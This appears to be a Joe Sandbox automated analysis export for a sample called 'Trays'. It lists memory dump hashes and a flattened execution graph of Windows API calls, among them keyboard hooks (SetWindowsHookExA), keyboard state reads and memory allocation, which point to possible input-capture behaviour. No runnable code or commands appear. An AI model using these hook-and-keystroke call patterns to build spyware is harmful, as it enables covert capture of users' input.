                                                                                                                                                                    • Source File: 00000029.00000002.21460713916.0000000000413000.00000020.00000001.01000000.00000008.sdmp, Offset: 00413000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_41_2_413000_Trays.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: L)X$h)X$(X$(X$(X$(X$)X
                                                                                                                                                                    • API String ID: 0-492065139
                                                                                                                                                                    • Opcode ID: 1cd85bce2cca8d94366ed2dc4a23235a1dcfd997d0464ce17873689e08e5ec94
                                                                                                                                                                    • Instruction ID: 0927aec3e8ef5ee4a9ed0348b1b6848a9facbaa60e644e566bd678ca98072e30
                                                                                                                                                                    • Opcode Fuzzy Hash: 1cd85bce2cca8d94366ed2dc4a23235a1dcfd997d0464ce17873689e08e5ec94
                                                                                                                                                                    • Instruction Fuzzy Hash: 0021F0747005808BDB05B766F90262E3AD1EB81308F51853AF5847F7E6C93D9C859FAE
                                                                                                                                                                    Function 04AA9C74 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcAddress.KERNEL32(04AAC330,00000000), ref: 04AA9CF6
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000029.00000002.21467718877.0000000004AA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 04AA1000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_41_2_4aa1000_Trays.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc
                                                                                                                                                                    • String ID: GetProcAddress$kernel32.dll$user32.dll
                                                                                                                                                                    • API String ID: 190572456-2524697592
                                                                                                                                                                    • Opcode ID: 66f81e73fcc1024c337cb5f1832877bee382fe7474c8ee1953c186c954ebd6c5
                                                                                                                                                                    • Instruction ID: c849fa34154f2761ab1ed774d5cb43326a87745c6908ee26f3338017478e6244
                                                                                                                                                                    • Opcode Fuzzy Hash: 66f81e73fcc1024c337cb5f1832877bee382fe7474c8ee1953c186c954ebd6c5
                                                                                                                                                                    • Instruction Fuzzy Hash: A711F7B0D04249AFEB21EFA4E684799BBF8EB18325F441594E80097340E7786EA1CB60

                                                                                                                                                                    Execution Graph

                                                                                                                                                                    Execution Coverage:7.7%
                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                    Signature Coverage:0.4%
                                                                                                                                                                    Total number of Nodes:1335
                                                                                                                                                                    Total number of Limit Nodes:14
                                                                                                                                                                    execution_graph 5803 3e38fe1 5806 3e38dbc GetVersionExA 5803->5806 5807 3e38ddf 5806->5807 6254 3e35ee0 6255 3e35ef6 GetDiskFreeSpaceA 6254->6255 6257 3e35f3b 6255->6257 6553 3e33de6 6554 3e33de8 WideCharToMultiByte 6553->6554 6858 3e374ea 6859 3e374ec 6858->6859 6860 3e37521 6859->6860 6861 3e37515 6859->6861 6863 3e3751f 6860->6863 6864 3e3499c 42 API calls 6860->6864 6862 3e33d60 11 API calls 6861->6862 6862->6863 6865 3e3499c 42 API calls 6863->6865 6864->6863 6866 3e37559 6865->6866 6867 3e3729c 42 API calls 6866->6867 6868 3e37568 6867->6868 6869 3e33cc8 11 API calls 6868->6869 6870 3e3757f 6869->6870 6871 3e33cc8 11 API calls 6870->6871 6872 3e37587 6871->6872 5809 3e373ee 5810 3e373f2 5809->5810 5811 3e373f7 5809->5811 5813 3e3309c 5810->5813 5818 3e3314c 5813->5818 5816 3e328c4 11 API calls 5817 3e330ad 5816->5817 5817->5811 5819 3e33152 5818->5819 5821 3e330a6 5819->5821 5822 3e341a4 5819->5822 5821->5816 5823 3e341b6 5822->5823 5825 3e341cf 5823->5825 5826 3e341f0 5823->5826 5825->5819 5827 3e341f9 5826->5827 5846 3e3422e 5826->5846 5828 3e34233 5827->5828 5829 3e3420e 5827->5829 5832 3e34244 5828->5832 5833 3e3423a 5828->5833 5830 3e34212 5829->5830 5831 3e34250 5829->5831 5836 3e34267 5830->5836 5837 3e34216 5830->5837 5834 3e34257 5831->5834 5835 3e3425e 5831->5835 5839 3e33cec 11 API calls 5832->5839 5838 3e33cc8 11 API calls 5833->5838 5851 3e34168 5834->5851 5854 3e34180 5835->5854 5836->5846 5858 3e341d8 5836->5858 5842 3e34276 5837->5842 5843 3e3421a 5837->5843 5838->5846 5839->5846 5842->5846 5847 3e341f0 13 API calls 5842->5847 5845 3e34294 5843->5845 5850 3e3421e 5843->5850 5845->5846 5848 3e341a4 13 API calls 5845->5848 5846->5823 5847->5842 5848->5845 5850->5846 5863 3e34308 5850->5863 5852 3e3416e SysFreeString 5851->5852 5853 3e3417c 5851->5853 5852->5853 5853->5846 5855 3e34186 5854->5855 5856 3e3418c SysFreeString 5855->5856 5857 3e3419e 5855->5857 5856->5855 5857->5846 5859 3e341e1 5858->5859 5860 3e341e8 5858->5860 5859->5836 5861 3e329b8 11 API calls 5860->5861 5862 3e341ef 5861->5862 5862->5836 5864 3e3430e 5863->5864 5868 3e34340 5863->5868 5865 3e34338 5864->5865 5867 3e341f0 13 API calls 5864->5867 5864->5868 5866 3e328c4 11 API calls 5865->5866 5866->5868 5867->5865 5868->5850 6262 3e3aeec 6263 3e3af20 CallNextHookEx 6262->6263 6264 3e3aeff CallNextHookEx 6262->6264 6265 3e3af36 6263->6265 6264->6265 6559 3e3adfa 6560 3e3adff 6559->6560 6561 3e32934 4 API calls 6560->6561 6562 3e3ae07 6561->6562 6563 3e39e3c 6 API calls 6562->6563 6564 3e3ae0c 6563->6564 6565 3e336f4 4 API calls 6564->6565 6566 3e3ae11 6565->6566 5869 3e36ffe 5870 3e37000 VirtualQuery 5869->5870 5871 3e37049 GetModuleFileNameA 5870->5871 5872 3e3702d GetModuleFileNameA 5870->5872 5873 3e37067 5871->5873 5872->5871 5872->5873 5879 3e3438c 5873->5879 5876 3e37111 5883 3e36428 5876->5883 5878 3e37180 5880 3e343a0 5879->5880 5881 3e343bc LoadStringA 5879->5881 5880->5881 5882 3e34344 30 API calls 5880->5882 5881->5876 5882->5881 5884 3e36458 5883->5884 5885 3e36439 5883->5885 5884->5878 5885->5884 5887 3e360b0 5885->5887 5893 3e360d9 5887->5893 5888 3e360ea 5906 3e36407 5888->5906 5892 3e36192 11 API calls 5892->5893 5893->5888 5893->5892 5895 3e361da 5893->5895 5903 3e360a4 5893->5903 5896 3e361eb 5895->5896 5898 3e36245 5895->5898 5896->5898 5901 3e362e3 5896->5901 5897 3e36407 11 API calls 5897->5898 5898->5897 5899 3e35d18 5898->5899 5909 3e36028 5898->5909 5899->5893 5901->5899 5913 3e36080 5901->5913 5904 3e33cc8 11 API calls 5903->5904 5905 3e360ae 5904->5905 5905->5893 5907 3e33cc8 11 API calls 5906->5907 5908 3e36414 5907->5908 5908->5884 5910 3e36039 5909->5910 5918 3e35c7c 5910->5918 5912 3e36079 5912->5898 5914 3e36098 5913->5914 5915 3e3608c 5913->5915 5916 3e329b8 11 API calls 5914->5916 5915->5899 5917 3e3609f 5916->5917 5917->5899 5921 3e37358 5918->5921 5920 3e35c95 5920->5912 5922 3e37366 5921->5922 5931 3e3499c 5922->5931 5924 3e37390 5937 3e36474 5924->5937 5929 3e33cec 11 API calls 5930 3e373c3 5929->5930 5930->5920 5932 3e349de 5931->5932 5933 3e349ad 5931->5933 5932->5924 5933->5932 5934 3e3438c 30 API calls 5933->5934 5935 3e349cd LoadStringA 5934->5935 5936 3e33db8 11 API calls 5935->5936 5936->5932 5946 3e36488 5937->5946 5940 3e33d1c 5941 3e33d20 5940->5941 5942 3e33d30 5940->5942 5941->5942 5944 3e33d8c 11 API calls 5941->5944 5943 3e33d5e 5942->5943 5945 3e328c4 11 API calls 5942->5945 5943->5929 5944->5942 5945->5943 5947 3e364ad 5946->5947 5948 3e360b0 42 API calls 5947->5948 5950 3e364d8 5947->5950 5948->5950 5949 3e36535 5951 3e33db8 11 API calls 5949->5951 5950->5949 5957 3e364ef 5950->5957 5952 3e36483 5951->5952 5952->5940 5953 3e3652a 5955 3e34104 11 API calls 5953->5955 5954 3e33cc8 11 API calls 5954->5957 5955->5952 5957->5953 5957->5954 5958 3e360b0 42 API calls 5957->5958 5959 3e34104 5957->5959 5958->5957 5960 3e34111 5959->5960 5964 3e34141 5959->5964 5962 3e3411d 5960->5962 5963 3e33d8c 11 API calls 5960->5963 5961 3e33cc8 11 API calls 5961->5962 5962->5957 5963->5964 5964->5961 6270 3e32efe 6271 3e32f3e GetKeyboardType 6270->6271 6873 3e38cfe 6874 3e38d00 GetKeyState GetKeyboardState 6873->6874 6875 3e38d28 6874->6875 6570 3e399c0 6571 3e399db 6570->6571 6572 3e399cc 6570->6572 6575 3e398f4 GetModuleHandleA 6572->6575 6574 3e399d1 RtlInitializeCriticalSection 6574->6571 6576 3e39934 6575->6576 6577 3e3990b GetProcAddress GetProcAddress 6575->6577 6576->6574 6577->6574 5562 3e327c8 5563 3e327f0 5562->5563 5564 3e327dd 5562->5564 5566 3e32811 5563->5566 5567 3e32807 RtlEnterCriticalSection 5563->5567 5600 3e319e4 RtlInitializeCriticalSection 5564->5600 5578 3e325c4 5566->5578 5567->5566 5570 3e327e6 5572 3e3281e 5574 3e32880 5572->5574 5575 3e32876 RtlLeaveCriticalSection 5572->5575 5575->5574 5576 3e3282a 5576->5572 5607 3e323ec 5576->5607 5579 3e325d8 5578->5579 5580 3e325fb 5579->5580 5582 3e3260a 5579->5582 5583 3e3269a 5579->5583 5580->5572 5588 3e32240 5580->5588 5582->5580 5621 3e31cd0 5582->5621 5583->5580 5586 3e32735 5583->5586 5624 3e31f88 5583->5624 5632 3e3208c 5583->5632 5586->5580 5628 3e31e90 5586->5628 5589 3e32252 5588->5589 5590 3e3225b 5588->5590 5591 3e319e4 4 API calls 5589->5591 5593 3e32284 RtlEnterCriticalSection 5590->5593 5594 3e3228e 5590->5594 5597 3e32263 5590->5597 5592 3e32257 5591->5592 5592->5590 5592->5597 5593->5594 5594->5597 5714 3e320f8 5594->5714 5597->5576 5598 3e323d1 RtlLeaveCriticalSection 5599 3e323db 5598->5599 5599->5576 5601 3e31a09 RtlEnterCriticalSection 5600->5601 5602 3e31a13 5600->5602 5601->5602 5603 3e31a31 LocalAlloc 5602->5603 5604 3e31a4b 5603->5604 5605 3e31aa1 RtlLeaveCriticalSection 5604->5605 5606 3e31aab 5604->5606 5605->5606 5606->5563 5606->5570 5608 3e32405 5607->5608 5609 3e3240a 5607->5609 5610 3e319e4 4 API calls 5608->5610 5611 3e3243b RtlEnterCriticalSection 5609->5611 5614 3e32445 5609->5614 5615 3e3240e 5609->5615 5610->5609 5611->5614 5612 3e3245b 5616 3e325b2 5612->5616 5617 3e325a8 RtlLeaveCriticalSection 5612->5617 5613 3e324f1 5613->5615 5618 3e31f88 7 API calls 5613->5618 5614->5612 5614->5613 5619 3e3251d 5614->5619 5615->5572 5616->5572 5617->5616 5618->5615 5619->5612 5620 3e31e90 7 API calls 5619->5620 5620->5612 5622 3e323ec 9 API calls 5621->5622 5623 3e31cf1 5622->5623 5623->5580 5625 3e31f9a 5624->5625 5626 3e31f91 5624->5626 5625->5583 5626->5625 5627 3e31cd0 9 API calls 5626->5627 5627->5625 5629 3e31f2b 5628->5629 5630 3e31eb5 5628->5630 5629->5630 5637 3e31dd4 5629->5637 5630->5580 5692 3e3180c 5632->5692 5634 3e320a1 5636 3e320ae 5634->5636 5703 3e31fd4 5634->5703 5636->5583 5639 3e31de8 5637->5639 5638 3e31e84 5638->5630 5639->5638 5640 3e31e20 5639->5640 5641 3e31e36 5639->5641 5650 3e31950 5640->5650 5642 3e31950 3 API calls 5641->5642 5644 3e31e34 5642->5644 5644->5638 5660 3e31c94 5644->5660 5646 3e31e57 5647 3e31e79 5646->5647 5665 3e31cf4 5646->5665 5670 3e31380 5647->5670 5651 3e3197a 5650->5651 5659 3e319d7 5650->5659 5674 3e316a8 5651->5674 5656 3e319b2 5658 3e31380 LocalAlloc 5656->5658 5656->5659 5658->5659 5659->5644 5661 3e31ca6 5660->5661 5662 3e31cb9 5660->5662 5663 3e31e90 9 API calls 5661->5663 5662->5646 5664 3e31cb6 5663->5664 5664->5646 5666 3e31d07 5665->5666 5667 3e31cf9 5665->5667 5666->5647 5668 3e31cd0 9 API calls 5667->5668 5669 3e31d06 5668->5669 5669->5647 5671 3e31392 5670->5671 5672 3e313b5 5671->5672 5673 3e31268 LocalAlloc 5671->5673 5672->5638 5673->5672 5676 3e316f9 5674->5676 5675 3e3175a 5678 3e312f8 5675->5678 5676->5675 5677 3e3172b VirtualFree 5676->5677 5677->5676 5679 3e31313 5678->5679 5686 3e31268 5679->5686 5682 3e31520 5685 3e3154e 5682->5685 5683 3e315c2 5683->5656 5684 3e3158c VirtualFree 5684->5685 5685->5683 5685->5684 5689 3e311dc 5686->5689 5690 3e31201 5689->5690 5691 3e311ea LocalAlloc 5689->5691 5690->5656 5690->5682 5691->5690 5697 3e3182f 5692->5697 5693 3e314a8 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 5693->5697 5694 3e318f5 5700 3e318a1 5694->5700 5710 3e315e8 5694->5710 5696 3e312f8 LocalAlloc 5696->5697 5697->5693 5697->5694 5697->5696 5698 3e318db 5697->5698 5699 3e31890 5697->5699 5701 3e31520 VirtualFree 5698->5701 5702 3e31520 VirtualFree 5699->5702 5700->5634 5701->5700 5702->5700 5704 3e31f88 9 API calls 5703->5704 5705 3e31fe8 5704->5705 5706 3e312f8 LocalAlloc 5705->5706 5707 3e31ff8 5706->5707 5708 3e31c94 9 API calls 5707->5708 5709 3e32000 5707->5709 5708->5709 5709->5636 5712 3e3163b 5710->5712 5711 3e3168a 5711->5700 5712->5711 5713 3e31671 VirtualAlloc 5712->5713 5713->5711 5713->5712 5717 3e3210f 5714->5717 5715 3e32150 5716 3e31e90 9 API calls 5715->5716 5719 3e32177 5715->5719 5716->5719 5717->5715 5717->5719 5720 3e32060 5717->5720 5719->5598 5719->5599 5725 3e31764 5720->5725 5722 3e32070 5723 3e3207d 5722->5723 5724 3e31fd4 9 API calls 5722->5724 5723->5717 5724->5723 5729 3e31782 5725->5729 5726 3e31790 5728 3e315e8 VirtualAlloc 5726->5728 5733 3e3179e 5728->5733 5729->5726 5730 3e312f8 LocalAlloc 5729->5730 5731 3e317f0 5729->5731 5729->5733 5734 3e31444 5729->5734 5730->5729 5732 3e31520 VirtualFree 5731->5732 5732->5733 5733->5722 5735 3e31453 VirtualAlloc 5734->5735 5737 3e314a3 5735->5737 5738 3e31480 5735->5738 5737->5729 5739 3e31268 LocalAlloc 5738->5739 5740 3e3148c 5739->5740 5740->5737 5741 3e31490 VirtualFree 5740->5741 5741->5737 5969 3e33bc8 5970 3e33bcc 5969->5970 5971 3e33b44 5 API calls 5970->5971 5972 3e33c0e 5970->5972 5971->5972 5973 3e33c5a FreeLibrary 5972->5973 5974 3e33c7e ExitProcess 5972->5974 5973->5972 5983 3e387d0 5984 3e3881a 5983->5984 5985 3e387e9 5983->5985 5986 3e341a4 13 API calls 5985->5986 5987 3e3880a 5986->5987 5988 3e341a4 13 API calls 5987->5988 5988->5984 5989 3e3abd8 5990 3e3abe3 5989->5990 5991 3e3abe7 SetWindowsHookExA 5990->5991 5992 3e3ac19 5990->5992 5994 3e39238 5991->5994 5995 3e3928c 5994->5995 5996 3e3925a GetLastError SetLastError GetModuleHandleExA 5994->5996 5995->5992 5996->5995 5997 3e3929f GetLastError 5996->5997 5997->5995 6578 3e36ddd 6579 3e33cc8 11 API calls 6578->6579 6580 3e36df7 GetThreadLocale 6579->6580 6581 3e36a94 12 API calls 6580->6581 6582 3e36e0f 6581->6582 6583 3e36e28 6582->6583 6586 3e36e87 6582->6586 6584 3e36e44 6583->6584 6585 3e36e79 6583->6585 6592 3e36e74 6584->6592 6597 3e33e94 6584->6597 6600 3e33f44 6584->6600 6587 3e33d1c 11 API calls 6585->6587 6591 3e340c4 11 API calls 6586->6591 6586->6592 6594 3e33f44 11 API calls 6586->6594 6596 3e33e94 11 API calls 6586->6596 6614 3e37b6c 6586->6614 6587->6592 6589 3e33cec 11 API calls 6590 3e36f95 6589->6590 6591->6586 6592->6589 6594->6586 6596->6586 6598 3e33db8 11 API calls 6597->6598 6599 3e33ea1 6598->6599 6599->6584 6601 3e33f87 6600->6601 6602 3e33f48 6600->6602 6601->6584 6603 3e33f52 6602->6603 6604 3e33d1c 6602->6604 6605 3e33f65 6603->6605 6606 3e33f7c 6603->6606 6610 3e33d8c 11 API calls 6604->6610 6611 3e33d30 6604->6611 6607 3e34104 11 API calls 6605->6607 6608 3e34104 11 API calls 6606->6608 6613 3e33f6a 6607->6613 6608->6613 6609 3e33d5e 6609->6584 6610->6611 6611->6609 6612 3e328c4 11 API calls 6611->6612 6612->6609 6613->6584 6615 3e37ba2 6614->6615 6616 3e37b80 6614->6616 6615->6586 6616->6615 6618 3e37b4c 6616->6618 6619 3e37b62 6618->6619 6620 3e37b58 CharNextA 6618->6620 6619->6615 6620->6615 5998 3e337dc 5999 3e337ed 5998->5999 6001 3e3384e 5998->6001 6000 3e337f6 UnhandledExceptionFilter 5999->6000 6002 3e3373c 5999->6002 6000->6001 6000->6002 6002->6001 6003 3e32960 7 API calls 6002->6003 6004 3e337d8 6003->6004 6621 3e375a6 6622 3e375a8 6621->6622 6625 3e374ec 6622->6625 6624 3e375b0 6626 3e37521 6625->6626 6627 3e37515 6625->6627 6629 3e3751f 6626->6629 6630 3e3499c 42 API calls 6626->6630 6628 3e33d60 11 API calls 6627->6628 6628->6629 6631 3e3499c 42 API calls 6629->6631 6630->6629 6632 3e37559 6631->6632 6639 3e3729c 6632->6639 6635 3e33cc8 11 API calls 6636 3e3757f 6635->6636 6637 3e33cc8 11 API calls 6636->6637 6638 3e37587 6637->6638 6638->6624 6640 3e372a8 6639->6640 6641 3e36474 42 API calls 6640->6641 6642 3e372d5 6641->6642 6643 3e33d1c 11 API calls 6642->6643 6644 3e372e0 6643->6644 6645 3e33cc8 11 API calls 6644->6645 6646 3e372f5 6645->6646 6646->6635 6009 3e387a4 6010 3e38834 6009->6010 6011 3e387bf 6009->6011 6012 3e3881a 6011->6012 6013 3e341a4 13 API calls 6011->6013 6014 3e3880a 6013->6014 6015 3e341a4 13 API calls 6014->6015 6015->6012 6888 3e3aca4 6889 3e3acb7 CallNextHookEx 6888->6889 6890 3e3acd8 CallNextHookEx 6888->6890 6892 3e3acee 6889->6892 6890->6892 6891 3e3add6 6892->6891 6893 3e399e0 4 API calls 6892->6893 6894 3e3ad30 6893->6894 6894->6891 6898 3e38d00 GetKeyState GetKeyboardState 6894->6898 6897 3e39d40 6 API calls 6897->6891 6899 3e38d28 6898->6899 6899->6897 6900 3e37caa 6901 3e37cac 6900->6901 6902 3e37c38 13 API calls 6901->6902 6903 3e37cc4 GetCPInfo 6902->6903 6904 3e37cce 6903->6904 6647 3e375a8 6648 3e374ec 42 API calls 6647->6648 6649 3e375b0 6648->6649 6650 3e385ac 6651 3e38713 6650->6651 6652 3e385c9 6650->6652 6696 3e38244 6652->6696 6654 3e385d8 6655 3e341f0 13 API calls 6654->6655 6656 3e385f2 6655->6656 6657 3e341f0 13 API calls 6656->6657 6658 3e38607 6657->6658 6659 3e341f0 13 API calls 6658->6659 6660 3e3861c 6659->6660 6661 3e33cc8 11 API calls 6660->6661 6662 3e38626 6661->6662 6663 3e34308 13 API calls 6662->6663 6664 3e38636 6663->6664 6665 3e34308 13 API calls 6664->6665 6666 3e38646 6665->6666 6667 3e341f0 13 API calls 6666->6667 6668 3e3865b 6667->6668 6669 3e341f0 13 API calls 6668->6669 6670 3e38670 6669->6670 6671 3e341f0 13 API calls 6670->6671 6672 3e38685 6671->6672 6673 3e341f0 13 API calls 6672->6673 6674 3e3869a 6673->6674 6675 3e341f0 13 API calls 6674->6675 6676 3e386af 6675->6676 6677 3e33cc8 11 API calls 6676->6677 6678 3e386b9 6677->6678 6679 3e33cc8 11 API calls 6678->6679 6680 3e386c3 6679->6680 6681 3e33cc8 11 API calls 6680->6681 6682 3e386cd 6681->6682 6683 3e33cc8 11 API calls 6682->6683 6684 3e386d7 6683->6684 6685 3e33cc8 11 API calls 6684->6685 6686 3e386e1 6685->6686 6687 3e33cc8 11 API calls 6686->6687 6688 3e386eb 6687->6688 6689 3e33cc8 11 API calls 6688->6689 6690 3e386f5 6689->6690 6691 3e33cc8 11 API calls 6690->6691 6692 3e386ff 6691->6692 6693 3e34168 SysFreeString 6692->6693 6694 3e38709 6693->6694 6695 3e33cc8 11 API calls 6694->6695 6695->6651 6697 3e38250 6696->6697 6698 3e3826b 6697->6698 6699 3e328c4 11 API calls 6697->6699 6698->6654 6699->6697 6273 3e31ab1 6274 3e31a98 6273->6274 6275 3e31aa1 RtlLeaveCriticalSection 6274->6275 6276 3e31aab 6274->6276 6275->6276 6905 3e334b6 6906 3e334c9 6905->6906 6912 3e334eb 6905->6912 6907 3e335a4 6906->6907 6910 3e33563 6906->6910 6906->6912 6908 3e335b6 UnhandledExceptionFilter 6907->6908 6909 3e33599 6907->6909 6908->6909 6908->6912 6911 3e34c90 4 API calls 6909->6911 6910->6909 6913 3e33584 UnhandledExceptionFilter 6910->6913 6911->6912 6913->6909 6913->6912 6914 3e3a4b6 6915 3e3a4b8 NtdllDefWindowProc_A 6914->6915 6016 3e31bb5 6017 3e31b92 6016->6017 6018 3e31ba5 RtlDeleteCriticalSection 6017->6018 6019 3e31b9b RtlLeaveCriticalSection 6017->6019 6019->6018 6020 3e3abb5 6027 3e32934 6020->6027 6023 3e39e3c 6 API calls 6024 3e3abc7 6023->6024 6032 3e336f4 6024->6032 6028 3e34c90 4 API calls 6027->6028 6029 3e3293a 6028->6029 6030 3e32948 6029->6030 6031 3e34c90 4 API calls 6029->6031 6030->6023 6031->6030 6033 3e34c90 4 API calls 6032->6033 6034 3e336f9 6033->6034 6916 3e3a4b8 NtdllDefWindowProc_A 6917 3e3a0b8 UnhookWindowsHookEx 6708 3e399be 6709 3e399c0 6708->6709 6710 3e399db 6709->6710 6711 3e398f4 3 API calls 6709->6711 6712 3e399d1 RtlInitializeCriticalSection 6711->6712 6712->6710 6281 3e34abd 6296 3e32f6c GetKeyboardType 6281->6296 6283 3e34b03 6286 3e34b08 GetCommandLineA 6283->6286 6304 3e31178 GetStartupInfoA 6286->6304 6289 3e34b75 GetThreadLocale 6293 3e349f4 12 API calls 6289->6293 6290 3e34b48 GetVersion 6291 3e34b64 GetThreadLocale 6290->6291 6292 3e34b58 GetCurrentThreadId 6290->6292 6306 3e349f4 GetLocaleInfoA 6291->6306 6293->6292 6297 3e32f8e 6296->6297 6298 3e32f7b GetKeyboardType 6296->6298 6297->6283 6299 3e32f9c RegOpenKeyExA 6297->6299 6298->6297 6300 3e32fc7 RegQueryValueExA 6299->6300 6301 3e33014 6299->6301 6302 3e32ffe RegCloseKey 6300->6302 6301->6283 6302->6283 6305 3e3118e GetVersion 6304->6305 6305->6289 6305->6290 6307 3e34a2f 6306->6307 6308 3e33cc8 11 API calls 6307->6308 6309 3e34a59 6308->6309 6309->6292 6314 3e32e81 6315 3e32e47 6314->6315 6316 3e32e85 6314->6316 6317 3e32ef1 6316->6317 6318 3e32f64 GetKeyboardType 6316->6318 6918 3e33080 6919 3e3308a 6918->6919 6920 3e32894 11 API calls 6919->6920 6921 3e3308f 6920->6921 6714 3e39984 6715 3e399a7 6714->6715 6716 3e3999d RtlDeleteCriticalSection 6714->6716 6716->6715 6035 3e3338a 6039 3e3346d 6035->6039 6040 3e3339d 6035->6040 6036 3e33410 6037 3e3342b UnhandledExceptionFilter 6036->6037 6042 3e33405 6036->6042 6037->6039 6037->6042 6038 3e34c90 4 API calls 6038->6039 6040->6036 6040->6039 6041 3e333f0 UnhandledExceptionFilter 6040->6041 6041->6039 6041->6042 6042->6038 6723 3e3758d 6724 3e37577 6723->6724 6725 3e33cc8 11 API calls 6724->6725 6726 3e3757f 6725->6726 6727 3e33cc8 11 API calls 6726->6727 6728 3e37587 6727->6728 6729 3e3a597 6730 3e3a586 6729->6730 6733 3e3a500 SetWindowLongA 6730->6733 6732 3e3a591 6733->6732 6048 3e38f96 6049 3e38f98 6048->6049 6050 3e38fc6 6049->6050 6051 3e341f0 13 API calls 6049->6051 6051->6050 6926 3e31096 RaiseException 6927 3e33495 6928 3e34c90 4 API calls 6927->6928 6929 3e3349a 6928->6929 6319 3e3729a 6320 3e3729c 6319->6320 6321 3e36474 42 API calls 6320->6321 6322 3e372d5 6321->6322 6323 3e33d1c 11 API calls 6322->6323 6324 3e372e0 6323->6324 6325 3e33cc8 11 API calls 6324->6325 6326 3e372f5 6325->6326 6056 3e38f98 6057 3e38fb1 6056->6057 6058 3e38fc6 6056->6058 6059 3e341f0 13 API calls 6057->6059 6059->6058 6930 3e3109e RtlUnwind 6934 3e3a060 6935 3e3a06b 6934->6935 6936 3e3a0a1 6935->6936 6937 3e3a06f SetWindowsHookExA 6935->6937 6938 3e39238 4 API calls 6937->6938 6938->6936 6327 3e34a68 6328 3e34a81 6327->6328 6329 3e34aa4 6327->6329 6337 3e32aa8 6328->6337 6332 3e32aa8 4 API calls 6333 3e34a95 6332->6333 6334 3e32aa8 4 API calls 6333->6334 6335 3e34a9f 6334->6335 6344 3e31abc 6335->6344 6338 3e32ae7 6337->6338 6339 3e32ab8 6337->6339 6340 3e32ae5 6338->6340 6341 3e329e4 4 API calls 6338->6341 6339->6338 6342 3e32abe 6339->6342 6340->6332 6341->6340 6342->6340 6356 3e329e4 6342->6356 6345 3e31bb7 6344->6345 6346 3e31acf 6344->6346 6345->6329 6347 3e31af0 LocalFree 6346->6347 6348 3e31ae6 RtlEnterCriticalSection 6346->6348 6349 3e31b2e 6347->6349 6348->6347 6350 3e31b13 VirtualFree 6349->6350 6351 3e31b38 6349->6351 6350->6349 6352 3e31b85 6351->6352 6353 3e31b64 LocalFree 6351->6353 6354 3e31ba5 RtlDeleteCriticalSection 6352->6354 6355 3e31b9b RtlLeaveCriticalSection 6352->6355 6353->6352 6353->6353 6354->6329 6355->6354 6357 3e34c90 4 API calls 6356->6357 6358 3e329ec 6357->6358 6358->6340 6739 3e3896f 6740 3e38958 GetCurrentThreadId AttachThreadInput 6739->6740 5788 3e34c6c 5789 3e34c75 5788->5789 5790 3e34c8e 5788->5790 5794 3e34c44 5789->5794 5793 3e34c83 TlsFree 5793->5790 5795 3e34c6b 5794->5795 5796 3e34c4d 5794->5796 5795->5790 5795->5793 5796->5795 5797 3e34c56 TlsGetValue 5796->5797 5797->5795 5798 3e34c65 LocalFree 5797->5798 5798->5795 6939 3e37476 6940 3e3747a 6939->6940 6941 3e374ad 6940->6941 6942 3e374fa 6940->6942 6951 3e37484 6940->6951 6943 3e37521 6942->6943 6944 3e37515 6942->6944 6947 3e3751f 6943->6947 6948 3e3499c 42 API calls 6943->6948 6946 3e33d60 11 API calls 6944->6946 6945 3e374ab 6965 3e37418 6945->6965 6946->6947 6949 3e3499c 42 API calls 6947->6949 6948->6947 6953 3e37559 6949->6953 6951->6941 6951->6945 6952 3e374bd 6951->6952 6961 3e37260 6952->6961 6955 3e3729c 42 API calls 6953->6955 6956 3e37568 6955->6956 6957 3e33cc8 11 API calls 6956->6957 6958 3e3757f 6957->6958 6959 3e33cc8 11 API calls 6958->6959 6960 3e37587 6959->6960 6962 3e37267 6961->6962 6963 3e33d1c 11 API calls 6962->6963 6964 3e3727f 6963->6964 6964->6941 6973 3e329f4 6965->6973 6968 3e37451 6971 3e37358 42 API calls 6968->6971 6969 3e3743c 6970 3e37260 11 API calls 6969->6970 6972 3e3744f 6970->6972 6971->6972 6972->6941 6974 3e34c90 4 API calls 6973->6974 6975 3e329fa 6974->6975 6976 3e34c90 4 API calls 6975->6976 6977 3e32a05 6976->6977 6977->6968 6977->6969 6359 3e3b27b 6360 3e3b274 6359->6360 6360->6359 6361 3e3b330 6360->6361 6362 3e34cdc 64 API calls 6360->6362 6363 3e3b054 32 API calls 6361->6363 6362->6361 6364 3e3b34d 6363->6364 6365 3e33bd0 7 API calls 6364->6365 6366 3e3b352 6365->6366 6978 3e37848 6979 3e3786d 6978->6979 6980 3e37884 6979->6980 6981 3e3789b 6979->6981 6982 3e3787e 6979->6982 6983 3e37260 11 API calls 6980->6983 6992 3e37674 6981->6992 6982->6980 6984 3e378a6 6982->6984 6988 3e37897 6983->6988 6986 3e3499c 42 API calls 6984->6986 6987 3e378c5 6986->6987 6989 3e3729c 42 API calls 6987->6989 6990 3e33cc8 11 API calls 6988->6990 6989->6988 6991 3e37902 6990->6991 6993 3e376b5 6992->6993 6994 3e376c4 6992->6994 6996 3e3499c 42 API calls 6993->6996 6995 3e3499c 42 API calls 6994->6995 6998 3e376d1 VirtualQuery 6995->6998 6997 3e376c2 6996->6997 6997->6998 6999 3e376f3 GetModuleFileNameA 6998->6999 7000 3e377a9 6998->7000 6999->7000 7001 3e37710 6999->7001 7002 3e3499c 42 API calls 7000->7002 7006 3e35eb0 11 API calls 7001->7006 7003 3e377f2 7002->7003 7004 3e3729c 42 API calls 7003->7004 7005 3e377a5 7004->7005 7009 3e33cc8 11 API calls 7005->7009 7007 3e37747 7006->7007 7008 3e3499c 42 API calls 7007->7008 7010 3e37793 7008->7010 7011 3e3781e 7009->7011 7012 3e3729c 42 API calls 7010->7012 7013 3e33cec 11 API calls 7011->7013 7012->7005 7014 3e3782e 7013->7014 7015 3e33cc8 11 API calls 7014->7015 7016 3e37836 7015->7016 7016->6988 7017 3e3305f 7018 3e33063 7017->7018 7019 3e32ffe 